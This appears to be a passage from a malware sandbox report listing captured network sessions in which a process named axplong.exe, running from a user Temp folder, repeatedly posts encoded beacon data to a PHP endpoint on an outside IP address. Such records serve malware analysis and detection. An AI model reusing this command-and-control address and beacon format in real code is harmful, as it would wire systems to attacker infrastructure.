Sep 27, 2024 07:02:12.865134001 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:12.866034985 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:13.095765114 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49719	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:13.216696024 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:13.915076971 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:13.915976048 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:14.141984940 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49720	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:14.261881113 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:15.005763054 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:15.007226944 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:15.240976095 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49721	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:15.355390072 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:16.061007023 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:16.061783075 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:16.292433977 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49722	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:16.403985977 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:17.097100019 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:17.098262072 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:17.322303057 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49724	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:17.433954954 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:18.136229992 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:18.137312889 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:18.360410929 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49725	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:18.480709076 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:19.215290070 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:19.217108965 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:19.451111078 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49726	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:19.558619022 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:20.277343035 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:20.278129101 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:20.508101940 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49727	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:20.621521950 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:21.338819027 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:21.339728117 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:21.569061041 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	49728	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:21.685508966 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:22.383748055 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:22.385257959 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:22.611278057 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	49729	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:22.731244087 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:23.429603100 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:23.430541039 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:23.848789930 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.8	49730	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:23.965017080 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:24.662756920 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:24.663634062 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:24.896445990 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.8	49731	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:25.019562006 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:25.718122005 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:25.719909906 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
